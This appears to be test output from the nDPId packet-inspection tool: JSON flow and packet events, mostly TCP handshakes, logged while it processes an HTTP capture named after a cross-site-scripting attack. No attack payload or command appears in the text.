-00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347006233,"flow_last_seen":1499347011612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52628,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347007496,"flow_last_seen":1499347012613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52642,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347007496,"flow_last_seen":1499347012613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52642,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347010080,"flow_last_seen":1499347015613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52668,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347010080,"flow_last_seen":1499347015613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52668,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347011349,"flow_last_seen":1499347016613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52682,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347011349,"flow_last_seen":1499347016613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52682,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347012617,"flow_last_seen":1499347018613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52696,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347012617,"flow_last_seen":1499347018613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52696,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347141111,"flow_last_seen":1499347141111,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347141111,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54040,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1499347141111,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347141111,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8OEpAAD4GjYasEAABwKgKMtMYAFBIRqkCAAAAAKACchAH0QAAAgQFtAQCCAoBOZFIAAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1461,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":2,"flow_last_seen":1499347141111,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347141111,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0xgJZZF8SEapA6AScSAHLAAAAgQFtAQCCAoD42K\/ATmRSAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1462,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":3,"flow_last_seen":1499347141112,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347141112,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0OEtAAD4GjY2sEAABwKgKMtMYAFBIRqkDCWWRfYAQAOWmMgAAAQEICgE5kUkD42K\/"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1469,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347142412,"flow_last_seen":1499347142412,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347142412,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54054,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1469,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1499347142412,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347142412,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8YBRAAD4GZbysEAABwKgKMtMmAFBNdfKaAAAAAKACchC3tQAAAgQFtAQCCAoBOZKOAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1470,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":2,"flow_last_seen":1499347142413,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347142413,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0yYb67mHTXXym6AScSB7OgAAAgQFtAQCCAoD42QEATmSjgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1471,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":3,"flow_last_seen":1499347142413,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347142413,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0YBVAAD4GZcOsEAABwKgKMtMmAFBNdfKbG+u5iIAQAOUaQgAAAQEICgE5ko4D42QE"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1484,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347143676,"flow_last_seen":1499347143676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347143676,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54068,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1484,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1499347143676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347143676,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8BvpAAD4GvtasEAABwKgKMtM0AFB9ypUwAAAAAKACchDjgAAAAgQFtAQCCAoBOZPKAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1485,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":2,"flow_last_seen":1499347143676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347143676,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0zTpUSjmfcqVMaAScSBpBAAAAgQFtAQCCAoD42VAATmTygEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1486,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":3,"flow_last_seen":1499347143677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347143677,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0BvtAAD4Gvt2sEAABwKgKMtM0AFB9ypUx6VEo54AQAOUIDAAAAQEICgE5k8oD42VA"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1499,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347146267,"flow_last_seen":1499347146267,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347146267,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54094,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1499,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1499347146267,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347146267,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87ydAAD4G1qisEAABwKgKMtNOAFAXjXl1AAAAAKACchBi1wAAAgQFtAQCCAoBOZZSAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1500,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":2,"flow_last_seen":1499347146268,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347146268,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ006ckw3VF415dqAScSBNogAAAgQFtAQCCAoD42fIATmWUgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1501,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":3,"flow_last_seen":1499347146268,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347146268,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07yhAAD4G1q+sEAABwKgKMtNOAFAXjXl2nJMN1oAQAOXsqQAAAQEICgE5llID42fI"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1511,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347147523,"flow_last_seen":1499347147523,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347147523,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54108,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1511,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1499347147523,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347147523,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jHlAAD4GOVesEAABwKgKMtNcAFBPnRvyAAAAAKACchCHAwAAAgQFtAQCCAoBOZeLAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1512,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":2,"flow_last_seen":1499347147523,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347147523,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ01w4IOWQT50b86AScSD9SwAAAgQFtAQCCAoD42kCATmXiwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1513,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":3,"flow_last_seen":1499347147524,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347147524,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jHpAAD4GOV6sEAABwKgKMtNcAFBPnRvzOCDlkYAQAOWcUgAAAQEICgE5l4wD42kC"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1532,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347150236,"flow_last_seen":1499347150236,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150236,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54134,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1532,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1499347150236,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347150236,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ESlAAD4GtKesEAABwKgKMtN2AFB3vosbAAAAAKACchDs9wAAAgQFtAQCCAoBOZoyAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1533,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":2,"flow_last_seen":1499347150236,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347150236,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ03aiL1kKd76LHKAScSCDEQAAAgQFtAQCCAoD42uoATmaMgEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1534,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":3,"flow_last_seen":1499347150237,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347150237,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ESpAAD4GtK6sEAABwKgKMtN2AFB3voscoi9ZC4AQAOUiGQAAAQEICgE5mjID42uo"} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347024196,"flow_last_seen":1499347029616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52816,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347024196,"flow_last_seen":1499347029616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347025509,"flow_last_seen":1499347030616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52830,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347025509,"flow_last_seen":1499347030616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52830,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347028086,"flow_last_seen":1499347033617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52856,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347028086,"flow_last_seen":1499347033617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52856,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347029372,"flow_last_seen":1499347034616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52870,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347029372,"flow_last_seen":1499347034616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52870,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347030639,"flow_last_seen":1499347036617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52884,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347030639,"flow_last_seen":1499347036617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52884,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347034467,"flow_last_seen":1499347039618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52924,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347034467,"flow_last_seen":1499347039618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52924,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":315,"flow_first_seen":1499346976603,"flow_last_seen":1499347036773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4344,"flow_tot_l4_payload_len":231560,"flow_avg_l4_payload_len":735,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52298,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 